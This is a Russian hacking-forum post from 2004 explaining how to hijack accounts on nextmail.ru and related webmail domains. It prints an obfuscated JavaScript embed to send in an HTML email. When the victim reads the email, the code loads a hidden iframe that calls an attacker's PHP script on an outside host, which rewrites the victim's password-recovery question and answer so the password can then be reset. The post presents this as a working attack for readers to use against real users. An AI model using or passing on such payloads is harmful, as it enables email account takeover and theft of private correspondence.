Http://nextmail.ru

Discussion in 'Уязвимости' started by JazzzSummerMan, 20 Jun 2004.

  1. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Да.. снова о взломе почты. Старым добрым проверенным способом. Кому-то может быть и надоело, но слишком часто встречаюца мне в последнее время  такие &quot;чудесные&quot; творения веб-мастеров, и кому-то может будет даже интересно. Короче <span style='color:green'>http://nextmail.ru(xaker.ru, email.su, russian.ru, students.ru, programist.ru, designer.ru, mail2k.ru)</span>, об этой почте и пойдет речь. Заводим ящик на рамблер.ру, пишем письмо на адрес [email protected], в тело письма копируем:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    <embed src="&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58document.getElementById('xxx').innerHTML='<&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101 src=http://znakomstva.flip.ru/pochta.php?quest=X&amp;answ=Y width=0 height=0></&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101>';this.wav" width=0 height=0>
    <span id=xxx></span>[/QUOTE]<span id='postcolor'>

    Перед отправкой ставим флажок &quot;в виде хтмл&quot;(чем мне и нравицца собственно рамблер). Злодей читает письмо, срабатывает наш скрипт(удивительно, но JS проходит почти любым способом, при том при всем, что в настройках ящика по умолчнию стоит повышенная безопасность, типа от всяких вредоносных скриптов)) скриптзначит срабатывает, прописывается &lt;iframe&gt;, вызывается пхп http://znakomstva.flip.ru/pochta.php?quest=X&amp;answ=Y , меняются: вопрос на X, ответ на Y.
    Ну а дальше все понтно. Кстати оченб приятный интерфейс напоминания пароля)) Вводишь мыло, задается вопрос, вводишь ответ - и парольчик прямо тут и выдается) быстро и качественно, как говориться гыгы
    Скрипт pochta.php не привожу, подобный уже был описан во взломе форум.хакер.ру